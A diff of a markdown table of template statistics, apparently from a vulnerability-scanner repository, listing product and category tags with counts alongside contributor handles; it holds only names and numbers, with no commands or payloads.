| | | | | -| favicon | 2 | sshell | 1 | | | | | | | -| bypass | 2 | mhdsamx | 1 | | | | | | | -| adminer | 2 | furkansenan | 1 | | | | | | | -| openfire | 2 | sickwell | 1 | | | | | | | -| paloalto | 2 | jeya seelan | 1 | | | | | | | -| service | 2 | bjhulst | 1 | | | | | | | -| webcam | 2 | 0xteles | 1 | | | | | | | -| jsf | 2 | 0h1in9e | 1 | | | | | | | -| middleware | 2 | xstp | 1 | | | | | | | -| getsimple | 2 | sicksec | 1 | | | | | | | -| yapi | 2 | thevillagehacker | 1 | | | | | | | -| vcenter | 2 | raesene | 1 | | | | | | | -| couchdb | 2 | rotemreiss | 1 | | | | | | | -| activemq | 2 | schniggie | 1 | | | | | | | -| payara | 2 | remonsec | 1 | | | | | | | -| status | 2 | bolli95 | 1 | | | | | | | -| db | 2 | omarkurt | 1 | | | | | | | -| commax | 2 | 0xrod | 1 | | | | | | | -| totemomail | 2 | b0rn2r00t | 1 | | | | | | | -| xxljob | 2 | evolutionsec | 1 | | | | | | | -| mcafee | 2 | s1r1u5_ | 1 | | | | | | | -| liferay | 2 | tirtha_mandal | 1 | | | | | | | -| prtg | 2 | elouhi | 1 | | | | | | | -| natshell | 2 | luci | 1 | | | | | | | -| linux | 2 | pudsec | 1 | | | | | | | -| glassfish | 2 | regala_ | 1 | | | | | | | -| akamai | 2 | 0ut0fb4nd | 1 | | | | | | | -| ilo | 2 | ldionmarcil | 1 | | | | | | | -| igs | 2 | | | | | | | | | -| grav | 2 | | | | | | | | | -| ec2 | 2 | | | | | | | | | -| bruteforce | 2 | | | | | | | | | -| node | 2 | | | | | | | | | -| cache | 2 | | | | | | | | | -| frp | 2 | | | | | | | | | -| aviatrix | 2 | | | | | | | | | -| kong | 2 | | | | | | | | | -| openvpn | 2 | | | | | | | | | +| druid | 3 | kabirsuda | 1 | | | | | | | +| fanruan | 3 | geraldino2 | 1 | | | | | | | +| kevinlab | 3 | ahmetpergamum | 1 | | | | | | | +| mail | 3 | raesene | 1 | | | | | | | +| pega | 2 | sy3omda | 1 | | | | | | | +| hashicorp | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| phpcollab | 2 | evolutionsec | 1 | | | | | | | +| plesk | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| voipmonitor | 2 | kurohost | 1 | | | | | | | +| kong | 2 | noamrathaus | 1 | | | | | | | +| status | 2 | sickwell | 1 | | | | | | | +| hpe | 2 | becivells | 1 | | | | | | | +| payara | 2 | makyotox | 1 | | | | | | | +| grav | 2 | 0xrod | 1 | | | | | | | +| netsweeper | 2 | akash.c | 1 | | | | | | | +| rockmongo | 2 | rotemreiss | 1 | | | | | | | +| smb | 2 | intx0x80 | 1 | | | | | | | +| prtg | 2 | bolli95 | 1 | | | | | | | +| rstudio | 2 | _c0wb0y_ | 1 | | | | | | | +| mcafee | 2 | shreyapohekar | 1 | | | | | | | +| vcenter | 2 | ldionmarcil | 1 | | | | | | | +| bucket | 2 | akshansh | 1 | | | | | | | +| activemq | 2 | hanlaomo | 1 | | | | | | | +| jsf | 2 | shelld3v | 1 | | | | | | | +| cve2005 | 2 | yashgoti | 1 | | | | | | | +| ilo | 2 | alperenkesk | 1 | | | | | | | +| webcam | 2 | shifacyclewla | 1 | | | | | | | +| favicon | 2 | fmunozs | 1 | | | | | | | +| db | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| minio | 2 | xstp | 1 | | | | | | | +| avantfax | 2 | apt-mirror | 1 | | | | | | | +| couchdb | 2 | mass0ma | 1 | | | | | | | +| middleware | 2 | exploitation | 1 | | | | | | | +| chamilo | 2 | bad5ect0r | 1 | | | | | | | +| mida | 2 | rodnt | 1 | | | | | | | +| ecoa | 2 | th3.d1p4k | 1 | | | | | | | +| chyrp | 2 | dawid-czarnecki | 1 | | | | | | | +| idrac | 2 | qlkwej | 1 | | | | | | | +| yii | 2 | sullo | 1 | | | | | | | +| oauth | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| dos | 2 | iampritam | 1 | | | | | | | +| getsimple | 2 | 52971 | 1 | | | | | | | +| igs | 2 | divya_mudgal | 1 | | | | | | | +| chiyu | 2 | regala_ | 1 | | | | | | | +| bruteforce | 2 | its0x08 | 1 | | | | | | | +| sonicwall | 2 | zhenwarx | 1 | | | | | | | +| hjtcloud | 2 | borna nematzadeh | 1 | | | | | | | +| wordfence | 2 | vzamanillo | 1 | | | | | | | +| geowebserver | 2 | adrianmf | 1 | | | | | | | +| nextcloud | 2 | undefl0w | 1 | | | | | | | +| splunk | 2 | ilovebinbash | 1 | | | | | | | +| linux | 2 | b0rn2r00t | 1 | | | | | | | +| ecology | 2 | deena | 1 | | | | | | | +| waf | 2 | yavolo | 1 | | | | | | | +| prestashop | 2 | pdp | 1 | | | | | | | +| aruba | 2 | 0ut0fb4nd | 1 | | | | | | | +| qcubed | 2 | bjhulst | 1 | | | | | | | +| sharepoint | 2 | c3l3si4n | 1 | | | | | | | +| bypass | 2 | nytr0gen | 1 | | | | | | | +| flir | 2 | alph4byt3 | 1 | | | | | | | +| nagios | 2 | daviey | 1 | | | | | | | +| jboss | 2 | hakluke | 1 | | | | | | | +| axis2 | 2 | ipanda | 1 | | | | | | | +| hasura | 2 | wabafet | 1 | | | | | | | +| showdoc | 2 | knassar702 | 1 | | | | | | | +| sitecore | 2 | willd96 | 1 | | | | | | | +| ec2 | 2 | petruknisme | 1 | | | | | | | +| netis | 2 | elder tao | 1 | | | | | | | +| frp | 2 | tim_koopmans | 1 | | | | | | | +| hostheader-injection | 2 | omarkurt | 1 | | | | | | | +| maian | 2 | oscarintherocks | 1 | | | | | | | +| xxljob | 2 | gboddin | 1 | | | | | | | +| fortios | 2 | brabbit10 | 1 | | | | | | | +| ucmdb | 2 | izn0u | 1 | | | | | | | +| yapi | 2 | jeya seelan | 1 | | | | | | | +| icewarp | 2 | whynotke | 1 | | | | | | | +| guacamole | 2 | andysvints | 1 | | | | | | | +| totemomail | 2 | s1r1u5_ | 1 | | | | | | | +| akamai | 2 | revblock | 1 | | | | | | | +| adminer | 2 | streetofhackerr007 | 1 | | | | | | | +| shellshock | 2 | kareemse1im | 1 | | | | | | | +| aviatrix | 2 | patralos | 1 | | | | | | | +| axis | 2 | fopina | 1 | | | | | | | +| seeyon | 2 | alex | 1 | | | | | | | +| huawei | 2 | kre80r | 1 | | | | | | | +| service | 2 | elmahdi | 1 | | | | | | | +| emerge | 2 | push4d | 1 | | | | | | | +| storage | 2 | nerrorsec | 1 | | | | | | | +| harbor | 2 | absshax | 1 | | | | | | | +| cache | 2 | co0nan | 1 | | | | | | | +| github | 2 | un-fmunozs | 1 | | | | | | | +| nextjs | 2 | remonsec | 1 | | | | | | | +| liferay | 2 | me9187 | 1 | | | | | | | +| commax | 2 | zandros0 | 1 | | | | | | | +| enumeration | 2 | 0xtavian | 1 | | | | | | | +| globalprotect | 2 | jteles | 1 | | | | | | | +| natshell | 2 | b0yd | 1 | | | | | | | +| kentico | 2 | schniggie | 1 | | | | | | | +| leak | 2 | micha3lb3n | 1 | | | | | | | +| vrealize | 2 | | | | | | | | | +| saltstack | 2 | | | | | | | | | | akkadian | 2 | | | | | | | | | -| globalprotect | 2 | | | | | | | | | -| enumeration | 2 | | | | | | | | | -| axis2 | 2 | | | | | | | | | -| geowebserver | 2 | | | | | | | | | -| ecology | 2 | | | | | | | | | -| idrac | 2 | | | | | | | | | -| prestashop | 2 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| artica | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| beanstalk | 1 | | | | | | | | | -| nifi | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| zms | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| cloudron | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| werkzeug | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| shoretel | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| xampp | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | +| keycloak | 2 | | | | | | | | | +| wuzhicms | 2 | | | | | | | | | +| glassfish | 2 | | | | | | | | | +| spark | 2 | | | | | | | | | +| trixbox | 2 | | | | | | | | | +| paloalto | 2 | | | | | | | | | +| jeedom | 2 | | | | | | | | | +| sonarqube | 2 | | | | | | | | | +| odoo | 2 | | | | | | | | | +| node | 2 | | | | | | | | | +| tidb | 2 | | | | | | | | | +| dolibarr | 2 | | | | | | | | | +| openfire | 2 | | | | | | | | | +| openvpn | 2 | | | | | | | | | +| horde | 2 | | | | | | | | | | circontrol | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| kindeditor | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| imap | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | | netrc | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| database | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| okta | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| burp | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| gsoap | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| basic-auth | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| gurock | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| elfinder | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| daybyday | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| graphql | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| rocketchat | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| sql | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| luftguitar | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| lotus | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| terraform | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | | expn | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| vidyo | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| metabase | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | | email | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| olivetti | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | | shopware | 1 | | | | | | | | | -| eg | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| ognl | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| redmine | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| motorola | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | | domxss | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | | cloudinary | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | | spring | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| graylog | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| smartblog | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| s3 | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| rockethchat | 1 | | | | | | | | | -| etherpad | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| glowroot | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| pmb | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | | sar2html | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | | ruby | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | | natemail | 1 | | | | | | | | | -| gilacms | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | | skywalking | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| actuator | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | | owasp | 1 | | | | | | | | | | cockpit | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| tor | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| elasticsearch | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| pihole | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| mrtg | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | | monitorix | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| shoppable | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| woocommerce | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| novnc | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | | zzzcms | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| phpshowtime | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| 